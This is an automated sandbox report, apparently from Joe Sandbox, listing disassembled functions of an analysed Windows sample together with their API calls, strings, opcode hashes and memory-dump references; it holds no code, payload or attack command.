                                                            • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                            • String ID:
                                                            • API String ID: 2014098862-0
                                                            • Opcode ID: d5a1b8bbe2edf694e259af79357ba39b9e8c974147688906b95d57b0e6b3fa7d
                                                            • Instruction ID: 8091c9dad0e103a832a43b33d765fb33a6801a16472a92980ffcebdd38e6d579
                                                            • Opcode Fuzzy Hash: d5a1b8bbe2edf694e259af79357ba39b9e8c974147688906b95d57b0e6b3fa7d
                                                            • Instruction Fuzzy Hash: 6211E571550218BEF6206BA0EC4DFBA3B2DDF4C751F511425F758AB0A0CAF25C21DAA4
                                                            Function 001F8E03 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,001F8A84,00000B00,?,?), ref: 001F8E0C
                                                            • HeapAlloc.KERNEL32(00000000,?,001F8A84,00000B00,?,?), ref: 001F8E13
                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,001F8A84,00000B00,?,?), ref: 001F8E28
                                                            • GetCurrentProcess.KERNEL32(?,00000000,?,001F8A84,00000B00,?,?), ref: 001F8E30
                                                            • DuplicateHandle.KERNEL32(00000000,?,001F8A84,00000B00,?,?), ref: 001F8E33
                                                            • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,001F8A84,00000B00,?,?), ref: 001F8E43
                                                            • GetCurrentProcess.KERNEL32(001F8A84,00000000,?,001F8A84,00000B00,?,?), ref: 001F8E4B
                                                            • DuplicateHandle.KERNEL32(00000000,?,001F8A84,00000B00,?,?), ref: 001F8E4E
                                                            • CreateThread.KERNEL32(00000000,00000000,001F8E74,00000000,00000000,00000000), ref: 001F8E68
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                            • String ID:
                                                            • API String ID: 1957940570-0
                                                            • Opcode ID: f3bb3c2f1c8a57d11a1010f9de3f84852c77f368c82b5d67a5fba70f3a5f0d22
                                                            • Instruction ID: fece41498086395f95d95b0a442d5629ff8cdb47f67e0f1d7f2619a3c236f6b9
                                                            • Opcode Fuzzy Hash: f3bb3c2f1c8a57d11a1010f9de3f84852c77f368c82b5d67a5fba70f3a5f0d22
                                                            • Instruction Fuzzy Hash: EA01BF75640308FFE760ABA5ED4EF6B3B6CEB89711F405421FA09DB191CA709C11CB20
                                                            Function 00219A72 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 001F7652: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,001F758C,80070057,?,?,?,001F799D), ref: 001F766F
                                                              • Part of subcall function 001F7652: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,001F758C,80070057,?,?), ref: 001F768A
                                                              • Part of subcall function 001F7652: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,001F758C,80070057,?,?), ref: 001F7698
                                                              • Part of subcall function 001F7652: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,001F758C,80070057,?), ref: 001F76A8
                                                            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00219B1B
                                                            • _memset.LIBCMT ref: 00219B28
                                                            • _memset.LIBCMT ref: 00219C6B
                                                            • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00219C97
                                                            • CoTaskMemFree.OLE32(?), ref: 00219CA2
                                                            Strings
                                                            • NULL Pointer assignment, xrefs: 00219CF0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                            • String ID: NULL Pointer assignment
                                                            • API String ID: 1300414916-2785691316
                                                            • Opcode ID: 9d7a48121aef74222e6d0da9884f49e3ca326e4072b996794db7f36b92bac870
                                                            • Instruction ID: f1648a7dcfc1b6be44703b8c064acad38624d06527e333141229f2754ab6f3f7
                                                            • Opcode Fuzzy Hash: 9d7a48121aef74222e6d0da9884f49e3ca326e4072b996794db7f36b92bac870
                                                            • Instruction Fuzzy Hash: 30916A71D00219EBDB10DFA4DC94EDEBBB9AF18710F20416AF519A7281DB719A94CFA0
                                                            Function 00226FEF Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00227093
                                                            • SendMessageW.USER32(?,00001036,00000000,?), ref: 002270A7
                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 002270C1
                                                            • _wcscat.LIBCMT ref: 0022711C
                                                            • SendMessageW.USER32(?,00001057,00000000,?), ref: 00227133
                                                            • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00227161
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Window_wcscat
                                                            • String ID: SysListView32
                                                            • API String ID: 307300125-78025650
                                                            • Opcode ID: 71720635b5ceebff96e92c381952413d3d3f6fdedeb71a8b6b18db975ab12ed9
                                                            • Instruction ID: b026e25d82cfcc572fb9fac54d09567111b60a41eb2353647eea3dd45927c159
                                                            • Opcode Fuzzy Hash: 71720635b5ceebff96e92c381952413d3d3f6fdedeb71a8b6b18db975ab12ed9
                                                            • Instruction Fuzzy Hash: 4241B471918319BFEB219FA4DC89FEE77B8EF08350F10042AF544A7191D7719D988B50
                                                            Function 0021EC47 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00203E91: CreateToolhelp32Snapshot.KERNEL32 ref: 00203EB6
                                                              • Part of subcall function 00203E91: Process32FirstW.KERNEL32(00000000,?), ref: 00203EC4
                                                              • Part of subcall function 00203E91: CloseHandle.KERNEL32(00000000), ref: 00203F8E
                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0021ECB8
                                                            • GetLastError.KERNEL32 ref: 0021ECCB
                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0021ECFA
                                                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 0021ED77
                                                            • GetLastError.KERNEL32(00000000), ref: 0021ED82
                                                            • CloseHandle.KERNEL32(00000000), ref: 0021EDB7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                            • String ID: SeDebugPrivilege
                                                            • API String ID: 2533919879-2896544425
                                                            • Opcode ID: 3cc1d3dd795c119cad8f4d673c71a29dc2c47b6638393d37b52e86384515fd1b
                                                            • Instruction ID: d3ec57299cf9278f82ce86dfb5f874e8fe98fa4f5b26e511932d915e893904b0
                                                            • Opcode Fuzzy Hash: 3cc1d3dd795c119cad8f4d673c71a29dc2c47b6638393d37b52e86384515fd1b
                                                            • Instruction Fuzzy Hash: 5941E031210201AFCB20EF24DC95FBEB7E4AF61714F08805DF9429B2D2DBB5A855CB92
                                                            Function 00203226 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadIconW.USER32(00000000,00007F03), ref: 002032C5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: IconLoad
                                                            • String ID: blank$info$question$stop$warning
                                                            • API String ID: 2457776203-404129466
                                                            • Opcode ID: 2d065d39d359c0818afa74967daccbdc0b1cf3f58c085cb79053a947a8950807
                                                            • Instruction ID: 1d9966072d57be16b3294b9bdd41a397ded3937168ff0430cf7e7593f8582131
                                                            • Opcode Fuzzy Hash: 2d065d39d359c0818afa74967daccbdc0b1cf3f58c085cb79053a947a8950807
                                                            • Instruction Fuzzy Hash: 8B110535238347BEE7019E55DC43D6AB79CDF2A760F20402AFD00A61C2E7B19F6045A5
                                                            Function 00204534 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0020454E
                                                            • LoadStringW.USER32(00000000), ref: 00204555
                                                            • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0020456B
                                                            • LoadStringW.USER32(00000000), ref: 00204572
                                                            • _wprintf.LIBCMT ref: 00204598
                                                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 002045B6
                                                            Strings
                                                            • %s (%d) : ==> %s: %s %s, xrefs: 00204593
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: HandleLoadModuleString$Message_wprintf
                                                            • String ID: %s (%d) : ==> %s: %s %s
                                                            • API String ID: 3648134473-3128320259
                                                            • Opcode ID: dfb14fe1de5b96935887846728af6701611f7633f56782d4fa9917dfee63af90
                                                            • Instruction ID: 0b8cfe983ef5300bfbaf09cd278f7839c4655526517bd004a5dcae99e5be39ae
                                                            • Opcode Fuzzy Hash: dfb14fe1de5b96935887846728af6701611f7633f56782d4fa9917dfee63af90
                                                            • Instruction Fuzzy Hash: CC0171F2400208BBE760ABD4EE89EF6777CE708301F4004B5BB09E2051E6709E954B70
                                                            Function 0022D74C Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 001A2612: GetWindowLongW.USER32(?,000000EB), ref: 001A2623
                                                            • GetSystemMetrics.USER32(0000000F), ref: 0022D78A
                                                            • GetSystemMetrics.USER32(0000000F), ref: 0022D7AA
                                                            • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0022D9E5
                                                            • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0022DA03
                                                            • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0022DA24
                                                            • ShowWindow.USER32(00000003,00000000), ref: 0022DA43
                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 0022DA68
                                                            • DefDlgProcW.USER32(?,00000005,?,?), ref: 0022DA8B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                            • String ID:
                                                            • API String ID: 1211466189-0
                                                            • Opcode ID: 9e0ab1a9954ae395bab829c56b25f42fc986ea90eb7013a66f5248e8ed74aaea
                                                            • Instruction ID: 2aac26c69f68d5574395b0e09274419a5f0c8131de7307903ee19c99ea1fbf58
                                                            • Opcode Fuzzy Hash: 9e0ab1a9954ae395bab829c56b25f42fc986ea90eb7013a66f5248e8ed74aaea
                                                            • Instruction Fuzzy Hash: 47B17A71610226EFDF14CFA8D989BBD7BB1FF44701F088069EC489B295D774A9A0CB90
                                                            Function 001A2A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,001DC417,00000004,00000000,00000000,00000000), ref: 001A2ACF
                                                            • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,001DC417,00000004,00000000,00000000,00000000,000000FF), ref: 001A2B17
                                                            • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,001DC417,00000004,00000000,00000000,00000000), ref: 001DC46A
                                                            • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,001DC417,00000004,00000000,00000000,00000000), ref: 001DC4D6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: ShowWindow
                                                            • String ID:
                                                            • API String ID: 1268545403-0
                                                            • Opcode ID: afda23afa1ffb36ab0e3f3d668954955cd942528c09e53c9ad929cc11b2af197
                                                            • Instruction ID: e27ba0e06ecb8da46f8a94cedd876aa41347e11d2018fa1a6c9ac84cdeb36c02
                                                            • Opcode Fuzzy Hash: afda23afa1ffb36ab0e3f3d668954955cd942528c09e53c9ad929cc11b2af197
                                                            • Instruction Fuzzy Hash: 57412D79204681ABC7398B2CDD9CB7B7BA2AF57310F15882EE04787A60C775A842D750
                                                            Function 00207368 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • InterlockedExchange.KERNEL32(?,000001F5), ref: 0020737F
                                                              • Part of subcall function 001C0FF6: std::exception::exception.LIBCMT ref: 001C102C
                                                              • Part of subcall function 001C0FF6: __CxxThrowException@8.LIBCMT ref: 001C1041
                                                            • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 002073B6
                                                            • EnterCriticalSection.KERNEL32(?), ref: 002073D2
                                                            • _memmove.LIBCMT ref: 00207420
                                                            • _memmove.LIBCMT ref: 0020743D
                                                            • LeaveCriticalSection.KERNEL32(?), ref: 0020744C
                                                            • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00207461
                                                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 00207480
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                            • String ID:
                                                            • API String ID: 256516436-0
                                                            • Opcode ID: 78b46b81adb87d039267027d0efe2637cf7fb1b93497f4ef538b05c64075ac3c
                                                            • Instruction ID: 1b2a71617c523383332ebf21c89a8e8986555fc24911beae4591f396c01b90cd
                                                            • Opcode Fuzzy Hash: 78b46b81adb87d039267027d0efe2637cf7fb1b93497f4ef538b05c64075ac3c
                                                            • Instruction Fuzzy Hash: AB318E31904205EBDB10DF94DD89EAE7BB8EF45710B1441B9FD049B246DB30DA61CBA0
                                                            Function 00226442 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • DeleteObject.GDI32(00000000), ref: 0022645A
                                                            • GetDC.USER32(00000000), ref: 00226462
                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0022646D
                                                            • ReleaseDC.USER32(00000000,00000000), ref: 00226479
                                                            • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 002264B5
                                                            • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 002264C6
                                                            • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00229299,?,?,000000FF,00000000,?,000000FF,?), ref: 00226500
                                                            • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00226520
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                            • String ID:
                                                            • API String ID: 3864802216-0
                                                            • Opcode ID: e7343259c4a88a739b25ebb9f6c29d48b692d816b5e535c15864466ba4688824
                                                            • Instruction ID: 4692ce0a463d0eb480cf382865ffd7ea203230ff98ed9119c37ff1111f3cfe17
                                                            • Opcode Fuzzy Hash: e7343259c4a88a739b25ebb9f6c29d48b692d816b5e535c15864466ba4688824
                                                            • Instruction Fuzzy Hash: BA319F72200210BFEB218F90ED4AFEB3FADEF09761F040065FE089A195C6B59C52CB64
                                                            Function 001FC072 Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: _memcmp
                                                            • String ID:
                                                            • API String ID: 2931989736-0
                                                            • Opcode ID: af29dbde22477dc8c4afb847f7834c113851fcacf5b2b9672fb11b5d1e1e53ae
                                                            • Instruction ID: 83a14b04ada103715844a0a86ba8b62d754553320b26aba9bb62306f5024b264
                                                            • Opcode Fuzzy Hash: af29dbde22477dc8c4afb847f7834c113851fcacf5b2b9672fb11b5d1e1e53ae
                                                            • Instruction Fuzzy Hash: 1C21F9B5A4421DF7D214A5218E52FBF335CAF72394F084025FF0596383EB51DD26A1E5
                                                            Function 0020ED8E Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 001A9997: __itow.LIBCMT ref: 001A99C2
                                                              • Part of subcall function 001A9997: __swprintf.LIBCMT ref: 001A9A0C
                                                              • Part of subcall function 001BFEC6: _wcscpy.LIBCMT ref: 001BFEE9
                                                            • _wcstok.LIBCMT ref: 0020EEFF
                                                            • _wcscpy.LIBCMT ref: 0020EF8E
                                                            • _memset.LIBCMT ref: 0020EFC1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                            • String ID: X
                                                            • API String ID: 774024439-3081909835
                                                            • Opcode ID: c9d5839bcde5cc93ea2309ce7ae7aa873f363a5d5924dbf6bf48a20f34c5f106
                                                            • Instruction ID: 23dddc175ee50b2f16010d85f5057a1a24bf2950bc215dd95a5e6767b2198073
                                                            • Opcode Fuzzy Hash: c9d5839bcde5cc93ea2309ce7ae7aa873f363a5d5924dbf6bf48a20f34c5f106
                                                            • Instruction Fuzzy Hash: C0C1AD356183019FC764EF24C985A5AB7E4FFA5320F00492DF8999B6A2DB30ED55CB82
                                                            Function 001A1424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c4756b85d46880666f55f11990c51da894d090bd299e28678eb7aacc42c56cf8
                                                            • Instruction ID: 09eaaacec313f92723242ad620c83b2a1a962a8be2ff96b0ecab7e12507ea608
                                                            • Opcode Fuzzy Hash: c4756b85d46880666f55f11990c51da894d090bd299e28678eb7aacc42c56cf8
                                                            • Instruction Fuzzy Hash: B7718E75904109FFCB18CF98CC88ABEBB79FF8A314F118159F915AA251C730AA11CF64
                                                            Function 00216E8A Relevance: 10.7, APIs: 7, Instructions: 212COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5de4ec93eb69aee5b36f9621221d2e870f6a1df20feb5493478e9ad738958d16
                                                            • Instruction ID: 74122e15009d40581d684cc09e457af825037f68b08b16e43007d69daa33325d
